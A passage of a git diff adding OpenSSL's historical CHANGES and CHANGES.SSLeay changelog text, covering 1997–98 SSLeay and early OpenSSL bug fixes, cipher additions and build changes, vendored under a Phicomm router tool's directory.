+  *) Really fix the ASN1 IMPLICIT bug this time... Partial support for private
+     key usage extension and fuller support for authority key id.
+     [Steve Henson]
+
+  *) Add OAEP encryption for the OpenSSL crypto library. OAEP is the improved
+     padding method for RSA, which is recommended for new applications in PKCS
+     #1 v2.0 (RFC 2437, October 1998).
+     OAEP (Optimal Asymmetric Encryption Padding) has better theoretical
+     foundations than the ad-hoc padding used in PKCS #1 v1.5. It is secure
+     against Bleichbacher's attack on RSA.
+     [Ulf Moeller <ulf@fitug.de>, reformatted, corrected and integrated by
+      Ben Laurie]
+
+  *) Updates to the new SSL compression code
+     [Eric A. Young, (from changes to C2Net SSLeay, integrated by Mark Cox)]
+
+  *) Fix so that the version number in the master secret, when passed
+     via RSA, checks that if TLS was proposed, but we roll back to SSLv3
+     (because the server will not accept higher), that the version number
+     is 0x03,0x01, not 0x03,0x00
+     [Eric A. Young, (from changes to C2Net SSLeay, integrated by Mark Cox)]
+
+  *) Run extensive memory leak checks on SSL apps. Fixed *lots* of memory
+     leaks in ssl/ relating to new X509_get_pubkey() behaviour. Also fixes
+     in apps/ and an unrelated leak in crypto/dsa/dsa_vrf.c
+     [Steve Henson]
+
+  *) Support for RAW extensions where an arbitrary extension can be
+     created by including its DER encoding. See apps/openssl.cnf for
+     an example.
+     [Steve Henson]
+
+  *) Make sure latest Perl versions don't interpret some generated C array
+     code as Perl array code in the crypto/err/err_genc.pl script.
+     [Lars Weber <3weber@informatik.uni-hamburg.de>]
+
+  *) Modify ms/do_ms.bat to not generate assembly language makefiles since
+     not many people have the assembler. Various Win32 compilation fixes and
+     update to the INSTALL.W32 file with (hopefully) more accurate Win32
+     build instructions.
+     [Steve Henson]
+
+  *) Modify configure script 'Configure' to automatically create crypto/date.h
+     file under Win32 and also build pem.h from pem.org. New script
+     util/mkfiles.pl to create the MINFO file on environments that can't do a
+     'make files': perl util/mkfiles.pl >MINFO should work.
+     [Steve Henson]
+
+  *) Major rework of DES function declarations, in the pursuit of correctness
+     and purity. As a result, many evil casts evaporated, and some weirdness,
+     too. You may find this causes warnings in your code. Zapping your evil
+     casts will probably fix them. Mostly.
+     [Ben Laurie]
+
+  *) Fix for a typo in asn1.h. Bug fix to object creation script
+     obj_dat.pl. It considered a zero in an object definition to mean
+     "end of object": none of the objects in objects.h have any zeros
+     so it wasn't spotted.
+     [Steve Henson, reported by Erwann ABALEA <eabalea@certplus.com>]
+
+  *) Add support for Triple DES Cipher Block Chaining with Output Feedback
+     Masking (CBCM). In the absence of test vectors, the best I have been able
+     to do is check that the decrypt undoes the encrypt, so far. Send me test
+     vectors if you have them.
+     [Ben Laurie]
+
+  *) Correct calculation of key length for export ciphers (too much space was
+     allocated for null ciphers). This has not been tested!
+     [Ben Laurie]
+
+  *) Modifications to the mkdef.pl for Win32 DEF file creation. The usage
+     message is now correct (it understands "crypto" and "ssl" on its
+     command line). There is also now an "update" option. This will update
+     the util/ssleay.num and util/libeay.num files with any new functions.
+     If you do a: 
+     perl util/mkdef.pl crypto ssl update
+     it will update them.
+     [Steve Henson]
+
+  *) Overhauled the Perl interface (perl/*):
+     - ported BN stuff to OpenSSL's different BN library
+     - made the perl/ source tree CVS-aware
+     - renamed the package from SSLeay to OpenSSL (the files still contain
+       their history because I've copied them in the repository)
+     - removed obsolete files (the test scripts will be replaced
+       by better Test::Harness variants in the future)
+     [Ralf S. Engelschall]
+
+  *) First cut for a very conservative source tree cleanup:
+     1. merge various obsolete readme texts into doc/ssleay.txt
+     where we collect the old documents and readme texts.
+     2. remove the first part of files where I'm already sure that we no
+     longer need them because of three reasons: either they are just temporary
+     files which were left by Eric or they are preserved original files where
+     I've verified that the diff is also available in the CVS via "cvs diff
+     -rSSLeay_0_8_1b" or they were renamed (as it was definitely the case for
+     the crypto/md/ stuff).
+     [Ralf S. Engelschall]
+
+  *) More extension code. Incomplete support for subject and issuer alt
+     name, issuer and authority key id. Change the i2v function parameters
+     and add an extra 'crl' parameter in the X509V3_CTX structure: guess
+     what that's for :-) Fix to ASN1 macro which messed up
+     IMPLICIT tag and add f_enum.c which adds a2i, i2a for ENUMERATED.
+     [Steve Henson]
+
+  *) Preliminary support for ENUMERATED type. This is largely copied from the
+     INTEGER code.
+     [Steve Henson]
+
+  *) Add new function, EVP_MD_CTX_copy() to replace frequent use of memcpy.
+     [Eric A. Young, (from changes to C2Net SSLeay, integrated by Mark Cox)]
+
+  *) Make sure `make rehash' target really finds the `openssl' program.
+     [Ralf S. Engelschall, Matthias Loepfe <Matthias.Loepfe@adnovum.ch>]
+
+  *) Squeeze another 7% of speed out of MD5 assembler, at least on a P2. I'd
+     like to hear about it if this slows down other processors.
+     [Ben Laurie]
+
+  *) Add CygWin32 platform information to Configure script.
+     [Alan Batie <batie@aahz.jf.intel.com>]
+
+  *) Fixed ms/32all.bat script: `no_asm' -> `no-asm'
+     [Rainer W. Gerling <gerling@mpg-gv.mpg.de>]
+  
+  *) New program nseq to manipulate netscape certificate sequences
+     [Steve Henson]
+
+  *) Modify crl2pkcs7 so it supports multiple -certfile arguments. Fix a
+     few typos.
+     [Steve Henson]
+
+  *) Fixes to BN code.  Previously the default was to define BN_RECURSION
+     but the BN code had some problems that would cause failures when
+     doing certificate verification and some other functions.
+     [Eric A. Young, (from changes to C2Net SSLeay, integrated by Mark Cox)]
+
+  *) Add ASN1 and PEM code to support netscape certificate sequences.
+     [Steve Henson]
+
+  *) Add ASN1 and PEM code to support netscape certificate sequences.
+     [Steve Henson]
+
+  *) Add several PKIX and private extended key usage OIDs.
+     [Steve Henson]
+
+  *) Modify the 'ca' program to handle the new extension code. Modify
+     openssl.cnf for new extension format, add comments.
+     [Steve Henson]
+
+  *) More X509 V3 changes. Fix typo in v3_bitstr.c. Add support to 'req'
+     and add a sample to openssl.cnf so req -x509 now adds appropriate
+     CA extensions.
+     [Steve Henson]
+
+  *) Continued X509 V3 changes. Add to other makefiles, integrate with the
+     error code, add initial support to X509_print() and x509 application.
+     [Steve Henson]
+
+  *) Takes a deep breath and start addding X509 V3 extension support code. Add
+     files in crypto/x509v3. Move original stuff to crypto/x509v3/old. All this
+     stuff is currently isolated and isn't even compiled yet.
+     [Steve Henson]
+
+  *) Continuing patches for GeneralizedTime. Fix up certificate and CRL
+     ASN1 to use ASN1_TIME and modify print routines to use ASN1_TIME_print.
+     Removed the versions check from X509 routines when loading extensions:
+     this allows certain broken certificates that don't set the version
+     properly to be processed.
+     [Steve Henson]
+
+  *) Deal with irritating shit to do with dependencies, in YAAHW (Yet Another
+     Ad Hoc Way) - Makefile.ssls now all contain local dependencies, which
+     can still be regenerated with "make depend".
+     [Ben Laurie]
+
+  *) Spelling mistake in C version of CAST-128.
+     [Ben Laurie, reported by Jeremy Hylton <jeremy@cnri.reston.va.us>]
+
+  *) Changes to the error generation code. The perl script err-code.pl 
+     now reads in the old error codes and retains the old numbers, only
+     adding new ones if necessary. It also only changes the .err files if new
+     codes are added. The makefiles have been modified to only insert errors
+     when needed (to avoid needlessly modifying header files). This is done
+     by only inserting errors if the .err file is newer than the auto generated
+     C file. To rebuild all the error codes from scratch (the old behaviour)
+     either modify crypto/Makefile.ssl to pass the -regen flag to err_code.pl
+     or delete all the .err files.
+     [Steve Henson]
+
+  *) CAST-128 was incorrectly implemented for short keys. The C version has
+     been fixed, but is untested. The assembler versions are also fixed, but
+     new assembler HAS NOT BEEN GENERATED FOR WIN32 - the Makefile needs fixing
+     to regenerate it if needed.
+     [Ben Laurie, reported (with fix for C version) by Jun-ichiro itojun
+      Hagino <itojun@kame.net>]
+
+  *) File was opened incorrectly in randfile.c.
+     [Ulf Möller <ulf@fitug.de>]
+
+  *) Beginning of support for GeneralizedTime. d2i, i2d, check and print
+     functions. Also ASN1_TIME suite which is a CHOICE of UTCTime or
+     GeneralizedTime. ASN1_TIME is the proper type used in certificates et
+     al: it's just almost always a UTCTime. Note this patch adds new error
+     codes so do a "make errors" if there are problems.
+     [Steve Henson]
+
+  *) Correct Linux 1 recognition in config.
+     [Ulf Möller <ulf@fitug.de>]
+
+  *) Remove pointless MD5 hash when using DSA keys in ca.
+     [Anonymous <nobody@replay.com>]
+
+  *) Generate an error if given an empty string as a cert directory. Also
+     generate an error if handed NULL (previously returned 0 to indicate an
+     error, but didn't set one).
+     [Ben Laurie, reported by Anonymous <nobody@replay.com>]
+
+  *) Add prototypes to SSL methods. Make SSL_write's buffer const, at last.
+     [Ben Laurie]
+
+  *) Fix the dummy function BN_ref_mod_exp() in rsaref.c to have the correct
+     parameters. This was causing a warning which killed off the Win32 compile.
+     [Steve Henson]
+
+  *) Remove C++ style comments from crypto/bn/bn_local.h.
+     [Neil Costigan <neil.costigan@celocom.com>]
+
+  *) The function OBJ_txt2nid was broken. It was supposed to return a nid
+     based on a text string, looking up short and long names and finally
+     "dot" format. The "dot" format stuff didn't work. Added new function
+     OBJ_txt2obj to do the same but return an ASN1_OBJECT and rewrote 
+     OBJ_txt2nid to use it. OBJ_txt2obj can also return objects even if the
+     OID is not part of the table.
+     [Steve Henson]
+
+  *) Add prototypes to X509 lookup/verify methods, fixing a bug in
+     X509_LOOKUP_by_alias().
+     [Ben Laurie]
+
+  *) Sort openssl functions by name.
+     [Ben Laurie]
+
+  *) Get the gendsa program working (hopefully) and add it to app list. Remove
+     encryption from sample DSA keys (in case anyone is interested the password
+     was "1234").
+     [Steve Henson]
+
+  *) Make _all_ *_free functions accept a NULL pointer.
+     [Frans Heymans <fheymans@isaserver.be>]
+
+  *) If a DH key is generated in s3_srvr.c, don't blow it by trying to use
+     NULL pointers.
+     [Anonymous <nobody@replay.com>]
+
+  *) s_server should send the CAfile as acceptable CAs, not its own cert.
+     [Bodo Moeller <3moeller@informatik.uni-hamburg.de>]
+
+  *) Don't blow it for numeric -newkey arguments to apps/req.
+     [Bodo Moeller <3moeller@informatik.uni-hamburg.de>]
+
+  *) Temp key "for export" tests were wrong in s3_srvr.c.
+     [Anonymous <nobody@replay.com>]
+
+  *) Add prototype for temp key callback functions
+     SSL_CTX_set_tmp_{rsa,dh}_callback().
+     [Ben Laurie]
+
+  *) Make DH_free() tolerate being passed a NULL pointer (like RSA_free() and
+     DSA_free()). Make X509_PUBKEY_set() check for errors in d2i_PublicKey().
+     [Steve Henson]
+
+  *) X509_name_add_entry() freed the wrong thing after an error.
+     [Arne Ansper <arne@ats.cyber.ee>]
+
+  *) rsa_eay.c would attempt to free a NULL context.
+     [Arne Ansper <arne@ats.cyber.ee>]
+
+  *) BIO_s_socket() had a broken should_retry() on Windoze.
+     [Arne Ansper <arne@ats.cyber.ee>]
+
+  *) BIO_f_buffer() didn't pass on BIO_CTRL_FLUSH.
+     [Arne Ansper <arne@ats.cyber.ee>]
+
+  *) Make sure the already existing X509_STORE->depth variable is initialized
+     in X509_STORE_new(), but document the fact that this variable is still
+     unused in the certificate verification process.
+     [Ralf S. Engelschall]
+
+  *) Fix the various library and apps files to free up pkeys obtained from
+     X509_PUBKEY_get() et al. Also allow x509.c to handle netscape extensions.
+     [Steve Henson]
+
+  *) Fix reference counting in X509_PUBKEY_get(). This makes
+     demos/maurice/example2.c work, amongst others, probably.
+     [Steve Henson and Ben Laurie]
+
+  *) First cut of a cleanup for apps/. First the `ssleay' program is now named
+     `openssl' and second, the shortcut symlinks for the `openssl <command>'
+     are no longer created. This way we have a single and consistent command
+     line interface `openssl <command>', similar to `cvs <command>'.
+     [Ralf S. Engelschall, Paul Sutton and Ben Laurie]
+
+  *) ca.c: move test for DSA keys inside #ifndef NO_DSA. Make pubkey
+     BIT STRING wrapper always have zero unused bits.
+     [Steve Henson]
+
+  *) Add CA.pl, perl version of CA.sh, add extended key usage OID.
+     [Steve Henson]
+
+  *) Make the top-level INSTALL documentation easier to understand.
+     [Paul Sutton]
+
+  *) Makefiles updated to exit if an error occurs in a sub-directory
+     make (including if user presses ^C) [Paul Sutton]
+
+  *) Make Montgomery context stuff explicit in RSA data structure.
+     [Ben Laurie]
+
+  *) Fix build order of pem and err to allow for generated pem.h.
+     [Ben Laurie]
+
+  *) Fix renumbering bug in X509_NAME_delete_entry().
+     [Ben Laurie]
+
+  *) Enhanced the err-ins.pl script so it makes the error library number 
+     global and can add a library name. This is needed for external ASN1 and
+     other error libraries.
+     [Steve Henson]
+
+  *) Fixed sk_insert which never worked properly.
+     [Steve Henson]
+
+  *) Fix ASN1 macros so they can handle indefinite length construted 
+     EXPLICIT tags. Some non standard certificates use these: they can now
+     be read in.
+     [Steve Henson]
+
+  *) Merged the various old/obsolete SSLeay documentation files (doc/xxx.doc)
+     into a single doc/ssleay.txt bundle. This way the information is still
+     preserved but no longer messes up this directory. Now it's new room for
+     the new set of documenation files.
+     [Ralf S. Engelschall]
+
+  *) SETs were incorrectly DER encoded. This was a major pain, because they
+     shared code with SEQUENCEs, which aren't coded the same. This means that
+     almost everything to do with SETs or SEQUENCEs has either changed name or
+     number of arguments.
+     [Ben Laurie, based on a partial fix by GP Jayan <gp@nsj.co.jp>]
+
+  *) Fix test data to work with the above.
+     [Ben Laurie]
+
+  *) Fix the RSA header declarations that hid a bug I fixed in 0.9.0b but
+     was already fixed by Eric for 0.9.1 it seems.
+     [Ben Laurie - pointed out by Ulf Möller <ulf@fitug.de>]
+
+  *) Autodetect FreeBSD3.
+     [Ben Laurie]
+
+  *) Fix various bugs in Configure. This affects the following platforms:
+     nextstep
+     ncr-scde
+     unixware-2.0
+     unixware-2.0-pentium
+     sco5-cc.
+     [Ben Laurie]
+
+  *) Eliminate generated files from CVS. Reorder tests to regenerate files
+     before they are needed.
+     [Ben Laurie]
+
+  *) Generate Makefile.ssl from Makefile.org (to keep CVS happy).
+     [Ben Laurie]
+
+
+ Changes between 0.9.1b and 0.9.1c  [23-Dec-1998]
+
+  *) Added OPENSSL_VERSION_NUMBER to crypto/crypto.h and 
+     changed SSLeay to OpenSSL in version strings.
+     [Ralf S. Engelschall]
+  
+  *) Some fixups to the top-level documents.
+     [Paul Sutton]
+
+  *) Fixed the nasty bug where rsaref.h was not found under compile-time
+     because the symlink to include/ was missing.
+     [Ralf S. Engelschall]
+
+  *) Incorporated the popular no-RSA/DSA-only patches 
+     which allow to compile a RSA-free SSLeay.
+     [Andrew Cooke / Interrader Ldt., Ralf S. Engelschall]
+
+  *) Fixed nasty rehash problem under `make -f Makefile.ssl links'
+     when "ssleay" is still not found.
+     [Ralf S. Engelschall]
+
+  *) Added more platforms to Configure: Cray T3E, HPUX 11, 
+     [Ralf S. Engelschall, Beckmann <beckman@acl.lanl.gov>]
+
+  *) Updated the README file.
+     [Ralf S. Engelschall]
+
+  *) Added various .cvsignore files in the CVS repository subdirs
+     to make a "cvs update" really silent.
+     [Ralf S. Engelschall]
+
+  *) Recompiled the error-definition header files and added
+     missing symbols to the Win32 linker tables.
+     [Ralf S. Engelschall]
+
+  *) Cleaned up the top-level documents;
+     o new files: CHANGES and LICENSE
+     o merged VERSION, HISTORY* and README* files a CHANGES.SSLeay 
+     o merged COPYRIGHT into LICENSE
+     o removed obsolete TODO file
+     o renamed MICROSOFT to INSTALL.W32
+     [Ralf S. Engelschall]
+
+  *) Removed dummy files from the 0.9.1b source tree: 
+     crypto/asn1/x crypto/bio/cd crypto/bio/fg crypto/bio/grep crypto/bio/vi
+     crypto/bn/asm/......add.c crypto/bn/asm/a.out crypto/dsa/f crypto/md5/f
+     crypto/pem/gmon.out crypto/perlasm/f crypto/pkcs7/build crypto/rsa/f
+     crypto/sha/asm/f crypto/threads/f ms/zzz ssl/f ssl/f.mak test/f
+     util/f.mak util/pl/f util/pl/f.mak crypto/bf/bf_locl.old apps/f
+     [Ralf S. Engelschall]
+
+  *) Added various platform portability fixes.
+     [Mark J. Cox]
+
+  *) The Genesis of the OpenSSL rpject:
+     We start with the latest (unreleased) SSLeay version 0.9.1b which Eric A.
+     Young and Tim J. Hudson created while they were working for C2Net until
+     summer 1998.
+     [The OpenSSL Project]
+ 
+
+ Changes between 0.9.0b and 0.9.1b  [not released]
+
+  *) Updated a few CA certificates under certs/
+     [Eric A. Young]
+
+  *) Changed some BIGNUM api stuff.
+     [Eric A. Young]
+
+  *) Various platform ports: OpenBSD, Ultrix, IRIX 64bit, NetBSD, 
+     DGUX x86, Linux Alpha, etc.
+     [Eric A. Young]
+
+  *) New COMP library [crypto/comp/] for SSL Record Layer Compression: 
+     RLE (dummy implemented) and ZLIB (really implemented when ZLIB is
+     available).
+     [Eric A. Young]
+
+  *) Add -strparse option to asn1pars program which parses nested 
+     binary structures 
+     [Dr Stephen Henson <shenson@bigfoot.com>]
+
+  *) Added "oid_file" to ssleay.cnf for "ca" and "req" programs.
+     [Eric A. Young]
+
+  *) DSA fix for "ca" program.
+     [Eric A. Young]
+
+  *) Added "-genkey" option to "dsaparam" program.
+     [Eric A. Young]
+
+  *) Added RIPE MD160 (rmd160) message digest.
+     [Eric A. Young]
+
+  *) Added -a (all) option to "ssleay version" command.
+     [Eric A. Young]
+
+  *) Added PLATFORM define which is the id given to Configure.
+     [Eric A. Young]
+
+  *) Added MemCheck_XXXX functions to crypto/mem.c for memory checking.
+     [Eric A. Young]
+
+  *) Extended the ASN.1 parser routines.
+     [Eric A. Young]
+
+  *) Extended BIO routines to support REUSEADDR, seek, tell, etc.
+     [Eric A. Young]
+
+  *) Added a BN_CTX to the BN library.
+     [Eric A. Young]
+
+  *) Fixed the weak key values in DES library
+     [Eric A. Young]
+
+  *) Changed API in EVP library for cipher aliases.
+     [Eric A. Young]
+
+  *) Added support for RC2/64bit cipher.
+     [Eric A. Young]
+
+  *) Converted the lhash library to the crypto/mem.c functions.
+     [Eric A. Young]
+
+  *) Added more recognized ASN.1 object ids.
+     [Eric A. Young]
+
+  *) Added more RSA padding checks for SSL/TLS.
+     [Eric A. Young]
+
+  *) Added BIO proxy/filter functionality.
+     [Eric A. Young]
+
+  *) Added extra_certs to SSL_CTX which can be used
+     send extra CA certificates to the client in the CA cert chain sending
+     process. It can be configured with SSL_CTX_add_extra_chain_cert().
+     [Eric A. Young]
+
+  *) Now Fortezza is denied in the authentication phase because
+     this is key exchange mechanism is not supported by SSLeay at all.
+     [Eric A. Young]
+
+  *) Additional PKCS1 checks.
+     [Eric A. Young]
+
+  *) Support the string "TLSv1" for all TLS v1 ciphers.
+     [Eric A. Young]
+
+  *) Added function SSL_get_ex_data_X509_STORE_CTX_idx() which gives the
+     ex_data index of the SSL context in the X509_STORE_CTX ex_data.
+     [Eric A. Young]
+
+  *) Fixed a few memory leaks.
+     [Eric A. Young]
+
+  *) Fixed various code and comment typos.
+     [Eric A. Young]
+
+  *) A minor bug in ssl/s3_clnt.c where there would always be 4 0 
+     bytes sent in the client random.
+     [Edward Bishop <ebishop@spyglass.com>]
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/CHANGES.SSLeay b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/CHANGES.SSLeay
new file mode 100644
index 0000000..ca5cd72
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/CHANGES.SSLeay
@@ -0,0 +1,968 @@
+This file contains the changes for the SSLeay library up to version
+0.9.0b. For later changes, see the file "CHANGES".
+
+  SSLeay CHANGES
+  ______________
+
+Changes between 0.8.x and 0.9.0b
+
+10-Apr-1998
+
+I said the next version would go out at easter, and so it shall.
+I expect a 0.9.1 will follow with portability fixes in the next few weeks.
+
+This is a quick, meet the deadline.  Look to ssl-users for comments on what
+is new etc.
+
+eric (about to go bushwalking for the 4 day easter break :-)
+
+16-Mar-98
+    - Patch for Cray T90 from Wayne Schroeder <schroede@SDSC.EDU>
+    - Lots and lots of changes
+
+29-Jan-98
+    - ASN1_BIT_STRING_set_bit()/ASN1_BIT_STRING_get_bit() from
+      Goetz Babin-Ebell <babinebell@trustcenter.de>.
+    - SSL_version() now returns SSL2_VERSION, SSL3_VERSION or
+      TLS1_VERSION.
+
+7-Jan-98
+    - Finally reworked the cipher string to ciphers again, so it
+      works correctly
+    - All the app_data stuff is now ex_data with funcion calls to access.
+      The index is supplied by a function and 'methods' can be setup
+      for the types that are called on XXX_new/XXX_free.  This lets
+      applications get notified on creation and destruction.  Some of
+      the RSA methods could be implemented this way and I may do so.
+    - Oh yes, SSL under perl5 is working at the basic level.
+
+15-Dec-97
+    - Warning - the gethostbyname cache is not fully thread safe,
+      but it should work well enough.
+    - Major internal reworking of the app_data stuff.  More functions
+      but if you were accessing ->app_data directly, things will
+      stop working.
+    - The perlv5 stuff is working.  Currently on message digests,
+      ciphers and the bignum library.
+
+9-Dec-97
+    - Modified re-negotiation so that server initated re-neg
+      will cause a SSL_read() to return -1 should retry.
+      The danger otherwise was that the server and the
+      client could end up both trying to read when using non-blocking
+      sockets.
+
+4-Dec-97
+    - Lots of small changes
+    - Fix for binaray mode in Windows for the FILE BIO, thanks to
+      Bob Denny <rdenny@dc3.com>
+
+17-Nov-97
+    - Quite a few internal cleanups, (removal of errno, and using macros
+      defined in e_os.h).
+    - A bug in ca.c, pointed out by yasuyuki-ito@d-cruise.co.jp, where
+      the automactic naming out output files was being stuffed up.
+
+29-Oct-97
+    - The Cast5 cipher has been added.  MD5 and SHA-1 are now in assember
+      for x86.
+
+21-Oct-97
+    - Fixed a bug in the BIO_gethostbyname() cache.
+
+15-Oct-97
+    - cbc mode for blowfish/des/3des is now in assember.  Blowfish asm
+      has also been improved.  At this point in time, on the pentium,
+      md5 is %80 faster, the unoptimesed sha-1 is %79 faster,
+      des-cbc is %28 faster, des-ede3-cbc is %9 faster and blowfish-cbc
+      is %62 faster.
+
+12-Oct-97
+    - MEM_BUF_grow() has been fixed so that it always sets the buf->length
+      to the value we are 'growing' to.  Think of MEM_BUF_grow() as the
+      way to set the length value correctly.
+
+10-Oct-97
+    - I now hash for certificate lookup on the raw DER encoded RDN (md5).
+      This breaks things again :-(.  This is efficent since I cache
+      the DER encoding of the RDN.
+    - The text DN now puts in the numeric OID instead of UNKNOWN.
+    - req can now process arbitary OIDs in the config file.
+    - I've been implementing md5 in x86 asm, much faster :-).
+    - Started sha1 in x86 asm, needs more work.
+    - Quite a few speedups in the BN stuff.  RSA public operation
+      has been made faster by caching the BN_MONT_CTX structure.
+      The calulating of the Ai where A*Ai === 1 mod m was rather
+      expensive.  Basically a 40-50% speedup on public operations.
+      The RSA speedup is now 15% on pentiums and %20 on pentium
+      pro.
+
+30-Sep-97
+    - After doing some profiling, I added x86 adm for bn_add_words(),
+      which just adds 2 arrays of longs together.  A %10 speedup
+      for 512 and 1024 bit RSA on the pentium pro.
+
+29-Sep-97
+    - Converted the x86 bignum assembler to us the perl scripts
+      for generation.
+
+23-Sep-97
+    - If SSL_set_session() is passed a NULL session, it now clears the
+      current session-id.
+
+22-Sep-97
+    - Added a '-ss_cert file' to apps/ca.c.  This will sign selfsigned
+      certificates.
+    - Bug in crypto/evp/encode.c where by decoding of 65 base64
+      encoded lines, one line at a time (via a memory BIO) would report
+      EOF after the first line was decoded.
+    - Fix in X509_find_by_issuer_and_serial() from
+      Dr Stephen Henson <shenson@bigfoot.com>
+
+19-Sep-97
+    - NO_FP_API and NO_STDIO added.
+    - Put in sh config command.  It auto runs Configure with the correct
+      parameters.
+
+18-Sep-97
+    - Fix x509.c so if a DSA cert has different parameters to its parent,
+      they are left in place.  Not tested yet.
+
+16-Sep-97
+    - ssl_create_cipher_list() had some bugs, fixes from
+      Patrick Eisenacher <eisenach@stud.uni-frankfurt.de>
+    - Fixed a bug in the Base64 BIO, where it would return 1 instead
+      of -1 when end of input was encountered but should retry.
+      Basically a Base64/Memory BIO interaction problem.
+    - Added a HMAC set of functions in preporarion for TLS work.
+
+15-Sep-97
+    - Top level makefile tweak - Cameron Simpson <cs@zip.com.au>
+    - Prime generation spead up %25 (512 bit prime, pentium pro linux)
+      by using montgomery multiplication in the prime number test.
+
+11-Sep-97
+    - Ugly bug in ssl3_write_bytes().  Basically if application land
+      does a SSL_write(ssl,buf,len) where len > 16k, the SSLv3 write code
+      did not check the size and tried to copy the entire buffer.
+      This would tend to cause memory overwrites since SSLv3 has
+      a maximum packet size of 16k.  If your program uses
+      buffers <= 16k, you would probably never see this problem.
+    - Fixed a few errors that were cause by malloc() not returning
+      0 initialised memory..
+    - SSL_OP_NETSCAPE_CA_DN_BUG was being switched on when using
+      SSL_CTX_set_options(ssl_ctx,SSL_OP_ALL); which was a bad thing
+      since this flags stops SSLeay being able to handle client
+      cert requests correctly.
+
+08-Sep-97
+    - SSL_SESS_CACHE_NO_INTERNAL_LOOKUP option added.  When switched
+      on, the SSL server routines will not use a SSL_SESSION that is
+      held in it's cache.  This in intended to be used with the session-id
+      callbacks so that while the session-ids are still stored in the
+      cache, the decision to use them and how to look them up can be
+      done by the callbacks.  The are the 'new', 'get' and 'remove'
+      callbacks.  This can be used to determine the session-id
+      to use depending on information like which port/host the connection
+      is coming from.  Since the are also SSL_SESSION_set_app_data() and
+      SSL_SESSION_get_app_data() functions, the application can hold
+      information against the session-id as well.
+
+03-Sep-97
+    - Added lookup of CRLs to the by_dir method,
+      X509_load_crl_file() also added.  Basically it means you can
+      lookup CRLs via the same system used to lookup certificates.
+    - Changed things so that the X509_NAME structure can contain
+      ASN.1 BIT_STRINGS which is required for the unique
+      identifier OID.
+    - Fixed some problems with the auto flushing of the session-id
+      cache.  It was not occuring on the server side.
+
+02-Sep-97
+    - Added SSL_CTX_sess_cache_size(SSL_CTX *ctx,unsigned long size)
+      which is the maximum number of entries allowed in the
+      session-id cache.  This is enforced with a simple FIFO list.
+      The default size is 20*1024 entries which is rather large :-).
+      The Timeout code is still always operating.
+
+01-Sep-97
+    - Added an argument to all the 'generate private key/prime`
+      callbacks.  It is the last parameter so this should not
+      break existing code but it is needed for C++.
+    - Added the BIO_FLAGS_BASE64_NO_NL flag for the BIO_f_base64()
+      BIO.  This lets the BIO read and write base64 encoded data
+      without inserting or looking for '\n' characters.  The '-A'
+      flag turns this on when using apps/enc.c.
+    - RSA_NO_PADDING added to help BSAFE functionality.  This is a
+      very dangerous thing to use, since RSA private key
+      operations without random padding bytes (as PKCS#1 adds) can
+      be attacked such that the private key can be revealed.
+    - ASN.1 bug and rc2-40-cbc and rc4-40 added by
+      Dr Stephen Henson <shenson@bigfoot.com>
+
+31-Aug-97 (stuff added while I was away)    
+    - Linux pthreads by Tim Hudson (tjh@cryptsoft.com).
+    - RSA_flags() added allowing bypass of pub/priv match check
+      in ssl/ssl_rsa.c - Tim Hudson.
+    - A few minor bugs.
+
+SSLeay 0.8.1 released.
+
+19-Jul-97
+    - Server side initated dynamic renegotiation is broken.  I will fix
+      it when I get back from holidays.
+
+15-Jul-97
+    - Quite a few small changes.
+    - INVALID_SOCKET usage cleanups from Alex Kiernan <alex@hisoft.co.uk>
+
+09-Jul-97
+    - Added 2 new values to the SSL info callback.
+      SSL_CB_START which is passed when the SSL protocol is started
+      and SSL_CB_DONE when it has finished sucsessfully.
+
+08-Jul-97
+    - Fixed a few bugs problems in apps/req.c and crypto/asn1/x_pkey.c
+      that related to DSA public/private keys.
+    - Added all the relevent PEM and normal IO functions to support
+      reading and writing RSAPublic keys.
+    - Changed makefiles to use ${AR} instead of 'ar r'
+
+07-Jul-97
+    - Error in ERR_remove_state() that would leave a dangling reference
+      to a free()ed location - thanks to Alex Kiernan <alex@hisoft.co.uk>
+    - s_client now prints the X509_NAMEs passed from the server
+      when requesting a client cert.
+    - Added a ssl->type, which is one of SSL_ST_CONNECT or
+      SSL_ST_ACCEPT.  I had to add it so I could tell if I was
+      a connect or an accept after the handshake had finished.
+    - SSL_get_client_CA_list(SSL *s) now returns the CA names
+      passed by the server if called by a client side SSL.
+
+05-Jul-97
+    - Bug in X509_NAME_get_text_by_OBJ(), looking starting at index
+      0, not -1 :-(  Fix from Tim Hudson (tjh@cryptsoft.com).
+
+04-Jul-97
+    - Fixed some things in X509_NAME_add_entry(), thanks to
+      Matthew Donald <matthew@world.net>.
+    - I had a look at the cipher section and though that it was a
+      bit confused, so I've changed it.
+    - I was not setting up the RC4-64-MD5 cipher correctly.  It is
+      a MS special that appears in exported MS Money.
+    - Error in all my DH ciphers.  Section 7.6.7.3 of the SSLv3
+      spec.  I was missing the two byte length header for the
+      ClientDiffieHellmanPublic value.  This is a packet sent from
+      the client to the server.  The SSL_OP_SSLEAY_080_CLIENT_DH_BUG
+      option will enable SSLeay server side SSLv3 accept either
+      the correct or my 080 packet format.
+    - Fixed a few typos in crypto/pem.org.
+
+02-Jul-97
+    - Alias mapping for EVP_get_(digest|cipher)byname is now
+      performed before a lookup for actual cipher.  This means
+      that an alias can be used to 're-direct' a cipher or a
+      digest.
+    - ASN1_read_bio() had a bug that only showed up when using a
+      memory BIO.  When EOF is reached in the memory BIO, it is
+      reported as a -1 with BIO_should_retry() set to true.
+
+01-Jul-97
+    - Fixed an error in X509_verify_cert() caused by my
+      miss-understanding how 'do { contine } while(0);' works.
+      Thanks to Emil Sit <sit@mit.edu> for educating me :-)
+
+30-Jun-97
+    - Base64 decoding error.  If the last data line did not end with
+      a '=', sometimes extra data would be returned.
+    - Another 'cut and paste' bug in x509.c related to setting up the
+      STDout BIO.
+
+27-Jun-97
+    - apps/ciphers.c was not printing due to an editing error.
+    - Alex Kiernan <alex@hisoft.co.uk> send in a nice fix for
+      a library build error in util/mk1mf.pl
+
+26-Jun-97
+    - Still did not have the auto 'experimental' code removal
+      script correct.
+    - A few header tweaks for Watcom 11.0 under Win32 from
+      Rolf Lindemann <Lindemann@maz-hh.de>
+    - 0 length OCTET_STRING bug in asn1_parse
+    - A minor fix with an non-existent function in the MS .def files.
+    - A few changes to the PKCS7 stuff.
+
+25-Jun-97
+    SSLeay 0.8.0 finally it gets released.
+
+24-Jun-97
